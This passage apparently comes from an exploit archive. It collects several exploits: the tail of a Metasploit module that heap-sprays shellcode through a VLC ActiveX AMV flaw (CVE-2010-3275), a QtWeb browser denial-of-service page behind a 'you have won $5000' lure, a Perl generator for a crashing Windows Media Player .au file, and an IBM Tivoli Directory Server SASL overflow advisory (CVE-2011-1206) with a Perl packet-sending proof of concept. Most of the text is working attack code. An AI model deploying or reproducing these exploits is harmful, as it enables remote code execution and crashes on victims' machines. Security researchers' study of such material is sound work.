                    [ 'Windows XP SP3 IE7', {'Ret'=>0x1c1c1c1c} ],
                ],
            'DisclosureDate' => "Mar 23 2011",
            'DefaultTarget' => 0))
 
    end
 
    def getRet(cli, request)
        if target.name == 'Automatic'
 
            agent = request.headers['User-Agent']
 
            case agent
            when /MSIE 6\.0/
                return [0x0c0c0c0c].pack('V') * 8
            when /MSIE 7\.0/
                return [0x1c1c1c1c].pack('V') * 8
            when /^vlc/
                #VLC identifies itself as "VLC" when requesting our trigger file
                return ""
            when /^NSPlayer/
                #NSPlayer is also used while requesting the trigger file
                return ""
            else
                return nil
            end
 
        else
 
            #User manually specified a target
            return [target.ret].pack('V') * 8
 
        end
    end
 
    def exploit
        path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2010-3275.amv")
        f = File.open(path, "rb")
        @trigger = f.read
        f.close
 
        super
    end
 
    def on_request_uri(cli, request)
 
        #Determine if client is a potential victim either manually or automatically,
        #and then return the appropriate EIP
        nops = getRet(cli, request)
        if nops == nil
            send_not_found(cli)
            return
        end
 
        if request.uri.match(/\.amv/)
            print_status("Sending trigger file to #{cli.peerhost}:#{cli.peerport}")
            send_response(cli, @trigger, { 'Content-Type' => 'text/plain' } )
            return
        end
 
        nopsled   = Rex::Text.to_unescape(nops, Rex::Arch.endian(target.arch))
        shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
 
        js_func_name             = rand_text_alpha(rand(6) + 3)
        js_var_blocks_name       = rand_text_alpha(rand(6) + 3)
        js_var_shell_name        = rand_text_alpha(rand(6) + 3)
        js_var_nopsled_name      = rand_text_alpha(rand(6) + 3)
        js_var_index_name        = rand_text_alpha(rand(6) + 3)
        trigger_file             = datastore['URIPATH'] + "/" + rand_text_alpha(rand(6) + 3) + ".amv"
 
        html = <<-EOS
        <html>
        <head>
        <script>
        function #{js_func_name}() {
            var #{js_var_blocks_name} = new Array();
            var #{js_var_shell_name} = unescape("#{shellcode}");
            var #{js_var_nopsled_name} = unescape("#{nopsled}");
            do { #{js_var_nopsled_name} += #{js_var_nopsled_name} } while (#{js_var_nopsled_name}.length < 82000);
            for (#{js_var_index_name}=0; #{js_var_index_name} < 3500; #{js_var_index_name}++) {
                #{js_var_blocks_name}[#{js_var_index_name}] = #{js_var_nopsled_name} + #{js_var_shell_name};
            }
        }
        #{js_func_name}();
        </script>
        </head>
        <body>
        <object classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921"
                codebase="http://downloads.videolan.org/pub/videolan/vlc/latest/win32/axvlc.cab"
                width="0" height="0"
                events="True">
        <param name="Src" value="#{trigger_file}"></param>
        <param name="ShowDisplay" value="False" ></param>
        <param name="AutoLoop" value="no"></param>
        <param name="AutoPlay" value="yes"></param>
        </object>
        </body>
        </html>
        EOS
 
        #Remove extra tabs in HTML
        html = html.gsub(/^\t\t/, "")
 
        print_status("Sending malicious page to #{cli.peerhost}:#{cli.peerport}...")
        send_response( cli, html, {'Content-Type' => 'text/html'} )
    end
end

QtWeb Browser Remote Denial of Service

**QtWeb Browser Remote Denial of Service** Product Description: QtWeb Browser Version: 3.7.2 (latest)

   Tested on: Windows Xp SP2/ Windows 7 ultimate

  
   
<------------------bug.html------------------------->

<html>
<head>
<title>Browser Remote Denial of Service </title>
<body bgcolor="teal">

<script type="text/javascript">
function loxians() {
var buffer = "";
for (var i = 0; i < 10000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 10000; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2><a href="javascript:loxians();">CLICK HERE YOU HAVE WON $5000 !!</a></font></h2>
</body>
</html>

<-----------------------bug.html ends------------------->

Windows Media Player 11 (.au) Local Proof Of Concept / DOS Exploit

#Windows Media Player 11 (.au) Local Proof Of Concept / DOS Exploit#

!/usr/bin/perl
sub logo(){
print q'

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
0 Windows Media Player 11 (.au) Local Proof Of Concept / DOS Exploit   1
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-0
';
}
# ---------
# Windows Media Player 11 (.au) Local Proof Of Concept Exploit
# ---------
# Tested in Windows XP sp3 
# Creating The Bad File .AU And Opening ...
# Stack Fram : quartz.dll ! 7486E82C() !
# PoC : 0x7486E82C | DIV | EAX,ECX
logo();
my $AU =
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01".
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E".
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x66\x66\x66\x00";
open (FILE,">> KedAns.au"); # Bad File Here
print FILE $AU;
close (FILE);

IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability


 
Application:   IBM Tivoli Directory Server SASL Bind Request Remote Code Execution Vulnerability
 
Platforms:   Windows
 
Exploitation:   Remote code execution
 
CVE Number:   CVE-2011-1206
 
ZDI number:   ZDI-11-136
 

 

 
 
#####################################################################################
 
1) Introduction
2) Report Timeline
3) Technical details
4) POC
 
#####################################################################################
 
===============
1) Introduction
===============
 
IBM Tivoli Directory Server (ITDS), formerly known as IBM Directory Server,
 
is an IBM implementation of the Lightweight Directory Access Protocol,
 
and is part of the IBM Tivoli Identity & Access Management portfolio.
 
IBM Tivoli Directory Server is a powerful, security-rich and standards-compliant
 
enterprise directory for corporate intranets and the Internet. Directory Server is
 
built to serve as the identity data foundation for rapid development and deployment
 
of Web applications and security and identity management initiatives by including
 
strong management, replication and security features.Several authentication methods
 
are available with IBM Tivoli Directory Server, beyond basic usernames and passwords.
 
ITDS supports digital certificate-based authentication, the Simple Authentication and
 
Security Layer (SASL), Challenge-Response Authentication Mechanism MD5 (CRAM-MD5),
 
and Kerberos authentication.IBM Tivoli Directory Server is a powerful LDAP
 
infrastructure that provides a foundation for deploying comprehensive identity management
 
applications and advanced software architectures.
 
(http://en.wikipedia.org/wiki/IBM_Tivoli_Directory_Server)
 
#####################################################################################
 
============================
2) Report Timeline
============================
 
2011-02-17 - Vulnerability reported to vendor
2011-04-18 - Coordinated public release of advisory
 
 
#####################################################################################
 
====================
3) Technical details
====================
 
This vulnerability allows remote attackers to execute arbitrary code on vulnerable
 
installations of IBM Tivoli Directory Server. Authentication is not required to
 
exploit this vulnerability. The specific flaw exists in how ibmslapd.exe handles
 
LDAP CRAM-MD5 packets. ibmslapd.exe listens by default on port TCP 389. When the
 
process receives an LDAP CRAM-MD5 packet, it uses libibmldap.dll to handle the
 
allocation of a buffer for the packet data. A specially crafted packet can cause
 
the ber_get_int function to allocate a buffer that is too small to fit the packet
 
data, causing a subsequent stack-based buffer overflow. This can be leveraged by
 
a remote attacker to execute arbitrary code under the context of the SYSTEM user.
 
 
#####################################################################################
 
===========
4) POC
===========
 
#!/usr/bin/perl
 
 
use strict;
use warnings;
 
use Getopt::Std;
use IO::Socket::INET;
 
$SIG{INT}  = \&abort;
 
my $host  = '192.168.100.24';
my $port  = 389;
my $proto = 'tcp';
my $sockType = SOCK_STREAM;
my $timeout = 1;
 
my %opt;
my $opt_string = 'hH:P:t:';
getopts( "$opt_string", \%opt );
 
if (defined $opt{h}) {
    usage()
}
 
$host    = $opt{H} ? $opt{H} : $host;
$port    = $opt{P} ? $opt{P} : $port;
$timeout = $opt{t} ? $opt{t} : $timeout;
 
my @commands = (
{Command => 'Send',
 Data => "\x30\x18\x02\x01\x01\x60\x13\x02\x01\x03\x04\x00\xA3\x0C\x04\x08\x43\x52\x41\x4D\x2D\x4D\x44\x35\x04\x00"},
{Command => 'Receive'},
{Command => 'Send',
 Data => "\x30\x82\x01\x41\x02\x01\x02\x60\x82\x01\x3A\x02\x01\x03\x04\x00\xA3\x82\x01\x31\x04\x08\x43\x52\x41\x4D\x2D\x4D\x44\x35\x04\x84\xFF\xFF\xFF\xFF\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x36\x61\x37\x61\x31\x31\x34\x39\x36\x30\x33\x61\x64\x37\x64\x30\x33\x34\x39\x35\x66\x39\x65\x37\x31\x34\x66\x34\x30\x66\x31\x63"},
{Command => 'Receive'},
 
);
 
 
my $sock = new IO::Socket::INET (  
                PeerAddr => $host,
                        PeerPort => $port,
                        Proto => $proto,
                Type => $sockType,
                Timeout => $timeout,
            )
    or die "socket error: $!\n\n";
 
print "connected to: $host:$port\n";
 
$sock->autoflush(1);
binmode $sock;
 
 
foreach my $command (@commands)
{
    if ($command->{'Command'} eq 'Receive')
    {
        my $buf = receive($sock, $timeout);
        if (length $buf)
        {
            print "received: [$buf]\n";
        }
    }
    elsif ($command->{'Command'} eq 'Send')
    {
        print "sending: [".$command->{'Data'}."]\n";
        send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n";
    }
}
 
close ($sock);
 
 
sub receive
{
 my $sock = shift;
 my $timeout = shift;
 
 my $tmpbuf;
 my $buf = "";
 
 while(1)
 {
  eval {
    local $SIG{ALRM} = sub { die "timeout\n" };
    alarm $timeout;
 
    my $ret = read $sock, $tmpbuf, 1;
    if ( !defined $ret or $ret == 0 )
    {
        die "timeout\n";
    }
 
    alarm 0;
    $buf .= $tmpbuf;
  };
  if ($@) {
    if($@ eq "timeout\n")
    {
        last;
    }
    else {
        die "receive aborted\n";
    }
  }
 }
 return $buf;
}
 
sub abort
{
 print "...\n";
 if ($sock)
 {
  close $sock;
 }
 die "...\n";
}
sub usage